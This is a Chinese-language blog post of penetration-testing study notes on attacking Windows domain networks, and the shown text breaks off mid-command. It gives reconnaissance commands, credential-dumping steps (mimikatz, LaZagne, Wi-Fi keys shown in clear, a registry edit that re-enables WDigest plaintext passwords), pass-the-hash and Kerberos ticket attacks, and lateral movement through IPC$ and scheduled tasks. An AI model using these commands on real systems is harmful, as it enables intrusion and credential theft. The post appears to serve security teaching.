<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> 内网安全 · forg12_blog</title><meta name="description" content="内网安全 - forg12"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.png"><link rel="stylesheet" href="/css/apollo.css"><link rel="search" type="application/opensearchdescription+xml" href="http://example.com/atom.xml" title="forg12_blog"><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="forg12_blog" type="application/atom+xml">
</head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="/favicon.png" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">BLOG</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">ARCHIVE</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">内网安全</h1><div class="post-info">2022年2月10日</div><div class="post-content"><h1 id="1-基本认识"><a href="#1-基本认识" class="headerlink" title="1.基本认识"></a>1.基本认识</h1><p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637035658346-55551cfe-a36f-4881-b7af-769ddef7267b.png" alt="image.png"><br><strong>DMZ：</strong></p>
<ul>
<li>英文全名“Demilitarized Zone”，中文含义是“隔离区”，在安全领域的具体含义是“内外网防火墙之间的区域”。DMZ区是一个缓冲区，在DMZ区存放着一些公共服务器，比如论坛等。</li>
</ul>
<p><strong>工作组 VS 域环境：</strong></p>
<ul>
<li>工作组：地位平等，管理分散，没有集中管理。</li>
<li>域环境：地位不平等，管理集中，实现集中管理。</li>
<li>域环境也可以简单的理解为工作组的升级版，更好管理。</li>
<li>这里我们把域环境和工作组区分开来是因为他们的攻击手段不同，工作组中的攻击手法如DNS劫持、ARP欺骗在域环境下是没有作用的。有一些攻击手段需要一些条件，这些条件在域环境下没有，相应的攻击手段就会失效。</li>
</ul>
<p><strong>域控制器DC</strong>：</p>
<ul>
<li>域控DC是这个域中的管理者，域里面的最高权限，判断是否拿下整个域，就是看你是否拿下这台域控制器。</li>
</ul>
<p><strong>AD（活动目录）：</strong></p>
<ul>
<li>是微软所提供的目录服务（查询，身份验证），活动目录的核心包含了活动目录数据库，在活动目录数据库中包含了域中所有的对象（用户，计算机，组…），活动目录(Active Directory)是面向Windows Standard Server、Windows Enterprise Server 以及Windows Datacenter Server的目录服务。Active Directory储存了有关网络对象的信息，并且让管理员和用户能够轻松的查找和使用这些信息，Active Directory使用了一种结构化的数据储存方式，并以此作为基础对目录信息进行合乎逻辑的分层组织。</li>
</ul>
<p><strong>linux域渗透问题：</strong></p>
<ul>
<li>Q：AD域控制器只在windows server系统能做吗？Linux可以？</li>
<li>A：linux上也有相应的活动目录的，不过要装LDAP环境，一般企很少会用LDAP来管理的，因为功能上不及域强大，而且用linux来管理的话要求技术人员门槛也比较高，个人认为Linux还是比较适合做服务器好一点。（就是说Linux上面的域环境需要环境支撑，而且功能没有windows上的域强大，所以大部分我们遇见的都是windows，这也是没有Linux的原因。当然，Linux这个操作系统也是可以加入域的，比如域内有Linux的操作系统，有Linux的服务器也行，只是很少）</li>
</ul>
<p><strong>局域网技术适用问题：</strong></p>
<ul>
<li>不同的攻击技术手段适用面不同，这个我们要有所了解，比如arp欺骗适用于局域网，而不适用于域。</li>
</ul>
<p><strong>大概内网安全流程问题：</strong></p>
<ul>
<li>熟悉基础概念-信息收集-后续探针-权限提升-横向渗透-权限维持</li>
</ul>
<h1 id="2-信息收集"><a href="#2-信息收集" class="headerlink" title="2.信息收集"></a>2.信息收集</h1><h2 id="2-1基本信息收集"><a href="#2-1基本信息收集" class="headerlink" title="2.1基本信息收集"></a>2.1基本信息收集</h2><p>旨在了解当前服务器的计算机基本信息，为后续判断服务器角色，网络环境等做准备。<br>服务器角色就是这台服务器是干嘛的，它在内网中扮演什么角色，比如mary-pc就是个人办公电脑，SqlServer就是数据库服务器，每台服务器都是有一个角色的，是仅仅个人用，还是用来文件传输？用来dns解析？</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 假设已经拿下了一台内网服务器webserver：</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 详细信息（操作系统版本、补丁编号等信息）</span></span><br><span class="line">systeminfo </span><br><span class="line"><span class="meta">#</span><span class="bash"> 启动服务（查看当前主机开启了哪些服务，从服务中就可以判断它是什么角色）</span></span><br><span class="line">net start</span><br><span class="line"><span class="meta">#</span><span class="bash"> 进程列表（查看当前主机开启了哪些进程）</span></span><br><span class="line">tasklist </span><br><span class="line"><span class="meta">#</span><span class="bash"> 计划任务：</span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 	（若报错无法加载列资源，说明你的权限不够，因此要提权才能使用该命令）</span></span><br><span class="line">schtasks </span><br></pre></td></tr></table></figure>

<h2 id="2-2网络信息收集"><a href="#2-2网络信息收集" class="headerlink" title="2.2网络信息收集"></a>2.2网络信息收集</h2><p>旨在了解当前服务器的网络接口信息，为判断当前角色，功能，网络架构做准备</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 判断存在域-最简单方式查看主DNS后缀</span></span><br><span class="line">ipconfig /all </span><br><span class="line"><span class="meta">#</span><span class="bash"> 判断存在域</span></span><br><span class="line">net view /domain </span><br><span class="line"><span class="meta">#</span><span class="bash"> 判断主域（主域就是域控的意思）【在域环境下查看当前时间】</span></span><br><span class="line">net time /domain </span><br><span class="line"><span class="meta">#</span><span class="bash"> 追踪来源地址</span></span><br><span class="line">nslookup &lt;域控制器全名&gt; </span><br><span class="line"><span class="meta">#</span><span class="bash"> 当前网络端口开放</span></span><br><span class="line">netstat -ano </span><br></pre></td></tr></table></figure>

<p>&lt;1&gt;ipconfig /all 查看主DNS后缀，这就是当前最简单最直接判断当前服务器是域环境还是单纯的工作组局域网环境！有域的话会有主DNS，因为在域环境里面通常会由DNS解析服务器。这是第一个判断标准。<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037217069-92850a47-96ec-40a6-af6d-d663c7aa1056.png" alt="image.png"><br>&lt;2&gt;net view /domain 判断存在域<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037245281-d03af11d-4e0b-4d0e-ad66-5288a0dd275e.png" alt="image.png"><br>&lt;3&gt;net time /domain 判断主域（主域就是域控的意思）【在域环境下查看当前时间】<br>net time /domain  可以判断主域，是因为域成员计算机的时间一般会以域控制器为准，所以当执行net time /domain命令时，该计算机会去域控获取时间，此时返回的OWA2010CN-God.god.org就是域控的计算机全名。然后可以通过nslookup来最终确认域控IP。<br>每一台计算机名字都是基于域名下面生成的（如SqlServer.god.org），另外，如果找到了god.org、sqlserver.god.org、xiaodi.sqlserver.god.org之类的计算机全名，说明当前环境存在多域，sqlserver.god.org是父域，xiaodi.sqlserver.god.org是子域。<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037265210-424a8538-89da-492a-b808-b596668903b7.png" alt="image.png"><br>&lt;4&gt;nslookup &lt;域控制器全名&gt;  追踪来源地址<br>OWA2010CN-God.god.org就是域控的计算机全名，我们可以通过nslookup和ping命令去ping这个名字来获取域控的对应ip地址。<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037284532-a7722f3a-1e26-432d-bec3-151168f923e5.png" alt="image.png"><br>&lt;5&gt;netstat -ano 查看当前网络端口开放<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037298414-89e204fd-9c8b-4df9-ac52-a5aafa064a3b.png" alt="image.png"></p>
<h2 id="2-3用户信息收集★★"><a href="#2-3用户信息收集★★" class="headerlink" title="2.3用户信息收集★★"></a>2.3用户信息收集★★</h2><p>旨在了解当前计算机或域环境下的用户及用户组信息，便于后期利用凭据进行测试<br>​</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 系统默认常见用户身份：</span></span><br><span class="line">Domain Admains：域管理员（默认对域控制器有完全控制权）</span><br><span class="line">Domain Computers：域内机器</span><br><span class="line">Domain Controllers：域控制器</span><br><span class="line">Domain Guest：域访客，权限低</span><br><span class="line">Domain users：域用户</span><br><span class="line">Enterprise Admains：企业系统管理员用户（默认对域控有完整控制权）</span><br><span class="line"></span><br><span class="line">Ps：我们主要攻击Domain Admains和Enterprise Admains</span><br><span class="line">		大部分成员主机在Domain users域用户里</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 相关用户收集操作命令：</span></span><br><span class="line">whoami /all 用户权限</span><br><span class="line">net config workstation 登录信息</span><br><span class="line">net user 当前电脑里面的用户（本地用户）</span><br><span class="line">net localgroup 本地用户组</span><br><span class="line">net user /domain 当前域里面的用户</span><br><span class="line">net group /domain 获取域用户组信息</span><br><span class="line">wmic useraccount get /all 涉及域用户详细信息</span><br><span class="line">net group &quot;Domain Admins&quot; /domain 查询域管理员账户</span><br><span class="line">net group &quot;Enterprise Admins&quot; /domain 查询管理员用户组</span><br><span class="line">net group &quot;Domain Controllers&quot; /domain 查询域控制器</span><br></pre></td></tr></table></figure>

<p>收集用户信息的作用：</p>
<ul>
<li>先找到域用户名，为后续进行密码账号的攻击做准备，后续攻击是可以用这些真实的用户名套用密码字典进行暴力破解，一旦找到对应的密码就可以登录计算机进行后续操作。看看用户名在哪个组，我就有什么权限。</li>
</ul>
<p>&lt;1&gt;net user 获取当前电脑里面的用户（本地用户），对于本地用户，当前计算机可通过用户名密码登录。<br>net user /domain 获取当前域里面的用户，对于域用户，当前计算机是否可登录，受活动目录限制，若权限不够，是不能登录的。<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037712248-a4c3c844-f348-4db0-894c-a99e822e66fb.png" alt="image.png"><br>&lt;2&gt;net localgroup 本地用户组<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037740617-6c55a89b-e548-4955-bb47-af70d034cb1c.png" alt="image.png"><br>&lt;3&gt;net group /domain 获取域用户组信息<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037754731-28fb51cb-8a08-435c-b007-786717b35822.png" alt="image.png"><br> &lt;4&gt;wmic useraccount get /all 涉及域用户详细信息<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037769730-f7a8f886-68de-4692-bc55-7530bc4e9a64.png" alt="image.png"><br>&lt;5&gt;net group “Domain Admins” /domain 查询域管理员账户<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037779617-0f29d0ee-77ed-41a0-a198-ca6eb975971b.png" alt="image.png"><br>&lt;6&gt;net group “Domain users” /domain 查询域用户<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637037799377-d460f364-b846-434c-aa54-213960f22ce6.png" alt="image.png"></p>
<h2 id="2-4凭据信息收集★★★"><a href="#2-4凭据信息收集★★★" class="headerlink" title="2.4凭据信息收集★★★"></a>2.4凭据信息收集★★★</h2><p>旨在收集各种密文，明文，口令等，为后续横向渗透做好测试准备<br>人能够记住的密码有限，所以一般用户习惯给很多网站、服务等设置相同的或者类似的密码，所以当你找到了一个密码，其他密码很有可能被猜解到。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">计算机用户HASH，明文获取   -mimikatz（win），mimipenguin（linux）</span><br><span class="line">计算机各种协议服务口令获取   -LaZagne（all,win&amp;linux），XenArmor（win）</span><br><span class="line"></span><br><span class="line">Netsh WLAN show profiles  //查询所有连接过的wifi名称</span><br><span class="line">Netsh WLAN show profile name =&quot;无线名称&quot; key =clear  //查询某wifi密码</span><br><span class="line"> </span><br><span class="line">获取凭据的方法：</span><br><span class="line">1.站点源码备份文件，数据库备份文件等</span><br><span class="line">2.各类数据库WEB管理入口，如PHPmyadmin</span><br><span class="line">3.浏览器保存密码，浏览器cookies</span><br><span class="line">4.其他用户会话，3389和ipc$连接记录，回收站内容</span><br><span class="line">5.windows 保存的WIFI密码</span><br><span class="line">6.网络内部的各种账号和密码，如：Email，VPN，FTP，OA等</span><br></pre></td></tr></table></figure>

<h3 id="2-4-1获取计算机用户名密码-mimikatz-amp-mimipenguin"><a href="#2-4-1获取计算机用户名密码-mimikatz-amp-mimipenguin" class="headerlink" title="2.4.1获取计算机用户名密码 mimikatz &amp; mimipenguin"></a>2.4.1获取计算机用户名密码 mimikatz &amp; mimipenguin</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> mimikatz下载：</span></span><br><span class="line">https://github.com/gentilkiwi/mimikatz/releases</span><br><span class="line"><span class="meta">#</span><span class="bash"> mimipenguin下载：</span></span><br><span class="line">https://github.com/huntergregal/mimipenguin/releases/</span><br></pre></td></tr></table></figure>

<p>新版mimikatz貌似运行有问题，下面是旧版运行结果，获取到了明文密码。注意：mimikatz运行需要域管理员权限，域用户无法运行，因为权限不够。<br><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637038393133-16e8ebb1-808a-41b4-bc65-59e73ac1e485.png" alt="image.png"><br>同样，mimipenguin运行需要root权限，普通用户无法运行。!<img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637038402684-f320285f-ab2a-4873-a82f-6942c6bd7734.png" alt="image.png"></p>
<h3 id="2-4-2获取计算机各种协议服务口令-LaZagne（all-win-amp-linux）-amp-XenArmor（win）"><a href="#2-4-2获取计算机各种协议服务口令-LaZagne（all-win-amp-linux）-amp-XenArmor（win）" class="headerlink" title="2.4.2获取计算机各种协议服务口令 LaZagne（all,win&amp;linux） &amp; XenArmor（win）"></a>2.4.2获取计算机各种协议服务口令 LaZagne（all,win&amp;linux） &amp; XenArmor（win）</h3><h4 id="LaZagne"><a href="#LaZagne" class="headerlink" title="LaZagne"></a>LaZagne</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">● 优点：免费；自动化脚本；支持win&amp;linux</span><br><span class="line">● 缺点：很多密码都获取不到，不好用</span><br><span class="line">● 下载：https://github.com/AlessandroZ/LaZagne</span><br></pre></td></tr></table></figure>

<p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637054017178-495d7bb6-bbf0-44eb-8cdd-534d8da045ea.png" alt="image.png"></p>
<h4 id="XenArmor"><a href="#XenArmor" class="headerlink" title="XenArmor"></a>XenArmor</h4><ul>
<li>国外软件，价格40-50美元，网上可能有破解版，不过是老版</li>
</ul>
<p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637054011562-ad95992f-e59e-4c09-897d-e41a4301b9df.png" alt="image.png"><br> 这两个软件主要是通过自动化翻找以下内容，从而获取凭据。</p>
<ul>
<li>1.站点源码备份文件，数据库备份文件等</li>
<li>2.各类数据库WEB管理入口，如PHPmyadmin</li>
<li>3.浏览器保存密码，浏览器cookies</li>
<li>4.其他用户会话，3389和ipc$连接记录，回收站内容</li>
<li>5.windows 保存的WIFI密码</li>
<li>6.网络内部的各种账号和密码，如：Email，VPN，FTP，OA等</li>
</ul>
<h2 id="2-5探针主机域控架构服务"><a href="#2-5探针主机域控架构服务" class="headerlink" title="2.5探针主机域控架构服务"></a>2.5探针主机域控架构服务</h2><p>为后续横向思路做准备，针对应用，协议等各类攻击手法</p>
<h3 id="2-5-1探针域控制器名及地址信息"><a href="#2-5-1探针域控制器名及地址信息" class="headerlink" title="2.5.1探针域控制器名及地址信息"></a>2.5.1探针域控制器名及地址信息</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">net time /domain</span><br><span class="line">nslookup &lt;域控名称&gt;</span><br><span class="line">ping &lt;域控名称&gt;</span><br><span class="line">  </span><br></pre></td></tr></table></figure>

<h3 id="2-5-2探针域内存活主机及地址信息"><a href="#2-5-2探针域内存活主机及地址信息" class="headerlink" title="2.5.2探针域内存活主机及地址信息"></a>2.5.2探针域内存活主机及地址信息</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> nbtscan下载：</span></span><br><span class="line">http://unixwiz.net/tools/nbtscan.html</span><br><span class="line"><span class="meta">#</span><span class="bash"> 第三方工具（老牌工具，说实在没必要用这个工具，不强大！不免杀！）</span></span><br><span class="line">nbtscan 192.168.3.0/24 </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 自带内部命令（推荐使用）</span></span><br><span class="line">for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr &quot;TTL =&quot; </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">其他：nmap，masscan，第三方Powershell脚本nishang、empire等（个人喜欢NiShang）</span><br></pre></td></tr></table></figure>

<p><strong>empire？？？？？</strong><br>NiShang简介：<br>Powershell用于渗透测试其实早在多年前就已经被提出了。利用Powershell，攻击者可以在无需接触磁盘的情况下执行命令等，并且相较已经被大家广泛关注并防御的Cmd而言，Powershell并非那么的引人瞩目。Nishang是基于PowerShell的渗透测试专用工具。它集成了框架、脚本和各种payload，能够帮助渗透测试人员在对Windows目标的全过程检测中使用，是一款来源于作者实战经历的智慧结晶。（类似于MSF）</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># &lt;1&gt;下载NiShang：</span></span><br><span class="line">https://github.com/samratashok/nishang</span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;2&gt;进入目录，执行以下命令</span></span><br><span class="line"><span class="comment"># 导入模块nishang</span></span><br><span class="line"><span class="built_in">Import-Module</span> .\nishang.psml        </span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置执行策略</span></span><br><span class="line"><span class="built_in">set-ExecutionPolicy</span> RemoteSigned    </span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取模块nishang的命令函数（有很多命令函数分别执行不同功能，比如以下命令）</span></span><br><span class="line"><span class="built_in">Get-Command</span> <span class="literal">-Module</span> nishang</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取常规计算机信息</span></span><br><span class="line"><span class="built_in">Get-information</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取计算机用户名密码</span></span><br><span class="line"><span class="built_in">Invoke-Mimikatz</span>             </span><br><span class="line"></span><br><span class="line"><span class="comment"># 端口扫描（查看目录对应文件有演示语法，其他同理）</span></span><br><span class="line"><span class="built_in">Invoke-Portscan</span> <span class="literal">-startaddress</span> <span class="number">192.168</span>.<span class="number">3.0</span> <span class="literal">-Endaddress</span> <span class="number">192.168</span>.<span class="number">3.100</span> <span class="literal">-ResolveHost</span> <span class="literal">-ScanPort</span>  </span><br><span class="line"></span><br><span class="line"><span class="comment"># 其他功能：删除补丁，反弹shell，凭据获取等</span></span><br></pre></td></tr></table></figure>



<h3 id="2-5-3探针域内主机角色及服务信息"><a href="#2-5-3探针域内主机角色及服务信息" class="headerlink" title="2.5.3探针域内主机角色及服务信息"></a>2.5.3探针域内主机角色及服务信息</h3><ul>
<li>利用开放端口服务及计算机名判断</li>
<li>核心业务机器：<ul>
<li>1.高级管理人员，系统管理员，财务/人事、业务人员的个人计算机</li>
<li>2.产品管理系统服务器</li>
<li>3.办公系统服务器</li>
<li>4.财务应用系统服务器</li>
<li>5.核心产品源码服务器</li>
<li>6.数据库服务器</li>
<li>7.文件或者网盘服务器</li>
<li>8.电子邮件服务器</li>
<li>9.网络监控系统服务器</li>
<li>10.其他服务器（内部技术文档服务器，其他监控服务器）</li>
</ul>
</li>
</ul>
<h1 id="3-横向渗透"><a href="#3-横向渗透" class="headerlink" title="3.横向渗透"></a>3.横向渗透</h1><p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637082735775-4c5e7c9f-5664-4d7d-be78-562243c10e7c.png" alt="image.png"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">知识点1：</span><br><span class="line">Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码</span><br><span class="line">Windows2012以下版本如安装KB2871997补丁，同样也会导致无法获取明文密码</span><br><span class="line"> </span><br><span class="line">针对以上情况，我们提供了4种方式解决此类问题</span><br><span class="line">    1.利用哈希hash传递(pth，ptk等)进行移动</span><br><span class="line">    2.利用其它服务协议(SMB,WMI等)进行哈希移动</span><br><span class="line">    3.利用注册表操作开启Wdigest Auth值进行获取</span><br><span class="line">    4.利用工具或第三方平台(Hachcat)进行破解获取</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash">注册表操作开启Wdigest Auth值</span></span><br><span class="line">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</span><br><span class="line"> </span><br><span class="line">知识点2：</span><br><span class="line">Windows系统LM Hash及NTLM Hash加密算法，个人系统在Windows vista后，</span><br><span class="line">											服务器系统在Windows 2003以后，认证方式均为NTLM Hash。</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash">获取win密码<span class="built_in">hash</span>的两个工具</span></span><br><span class="line">Pwdump7</span><br><span class="line">QuarksPwdump</span><br><span class="line"> </span><br><span class="line">知识点3：</span><br><span class="line">域用户与本地用户的区别</span><br><span class="line">比如，god/administrator是域用户，./administrator是本地用户</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637112584054-01c3ed08-d677-40ba-a6d7-854d1cf1c29b.png" alt="image.png"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">知识点：</span><br><span class="line"></span><br><span class="line">PTH （pass the hash） 利用lm或者ntlm的值进行的渗透测试</span><br><span class="line">PTT （pass the ticket） 利用的票据凭证TGT进行的渗透测试</span><br><span class="line">PTK （pass the key） 利用的ekeys aes256进行的渗透测试</span><br><span class="line">PTH在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM Hash远程访问主机或者服务，而不提供明文密码。</span><br><span class="line"></span><br><span class="line">如果禁用了ntlm认证，PsExec工具无法利用获得的ntlm hash进行远程连接，但是使用mimikatz工具还是可以攻击成功。</span><br><span class="line"></span><br><span class="line">对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012等，可以使用AES keys代替NT hash来实现ptk攻击。</span><br><span class="line"></span><br><span class="line">总结：KB2871997补丁后的影响</span><br><span class="line"></span><br><span class="line">pth：没打补丁用户都可以连接，打了补丁只能administrator连接</span><br><span class="line">ptk：打了补丁才能用户都可以连接，采用aes256连接</span><br><span class="line">https://www.freebuf.com/column/220740.html</span><br><span class="line">PTT攻击的部分就不是简单的NTLM认证了，它是利用Kerberos协议进行攻击的，这里就介绍三种常见的攻击方法：MS14-068，Golden ticket，SILVER ticket，简单来说就是将连接合法的票据注入到内存中实现连接。</span><br><span class="line"></span><br><span class="line">MS14-068基于漏洞，Golden ticket(黄金票据)，SILVER ticket(白银票据)</span><br><span class="line"></span><br><span class="line">其中Golden ticket(黄金票据)，SILVER ticket(白银票据)属于权限维持技术（不属于本课内容，以后会讲）</span><br><span class="line"></span><br><span class="line">MS14-068造成的危害是允许域内任何一个普通用户，将自己提升至域管权限。微软给出的补丁是kb3011780。</span><br><span class="line"></span><br><span class="line">补充-Kerberos协议具体工作方法，在域中，简要介绍一下：</span><br><span class="line"></span><br><span class="line">客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥)，发送给kdc（域控），kdc对用户进行检测，成功之后创建TGT(Ticket-Granting Ticket)</span><br><span class="line">将TGT进行加密签名返回给客户机器，只有域用户krbtgt才能读取kerberos中TGT数据</span><br><span class="line">然后客户机将TGT发送给域控制器KDC请求TGS（票证授权服务）票证，并且对TGT进行检测</span><br><span class="line">检测成功之后，将目标服务账户的NTLM以及TGT进行加密，将加密后的结果返回给客户机。</span><br></pre></td></tr></table></figure>

<h2 id="3-1横向渗透明文密码传递（at-schtasks）"><a href="#3-1横向渗透明文密码传递（at-schtasks）" class="headerlink" title="3.1横向渗透明文密码传递（at|schtasks）"></a>3.1横向渗透明文密码传递（at|schtasks）</h2><p>在拿下一台内网主机，通过本地信息搜集收集用户凭据等信息后，如何横向渗透拿下更多的主机？这里仅介绍at&amp;schtasks命令的使用，在已知目标系统的用户明文密码的基础上，直接可在远程主机上执行命令。<br>获取到某域主机权限-&gt; minikatz得到密码（明文，hash）-&gt;用到信息收集里面域用户的列表当做用户名字典-&gt;用到密码明文当做字典-&gt;尝试连接-&gt;创建计划任务（at|schtasks）-&gt;执行文件可为后门或者相关命令。<br>IPC（ Internet Process Connection）是共享“命名管道”的资管，它是为了让进城间通信而开放的命名管道，可以通过验证用户名和密码获得相关的权限，在远程管路计算机和查看计算机的共享资源时使用。</p>
<p>利用流程：<br>建立IPC链接到目标主机<br>-&gt;拷贝要执行的命令脚本到目标主机<br>-&gt;查看目标时间，创建计划任务（ at,schtasks ）定时执行拷贝到的脚本<br>-&gt;删除IPC链接</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 工作组</span></span><br><span class="line">net use \\server\ipc$&quot;password&quot; /user:username </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash">域内</span></span><br><span class="line">net use \\server\ipc$&quot;password&quot; /user:domain\username </span><br><span 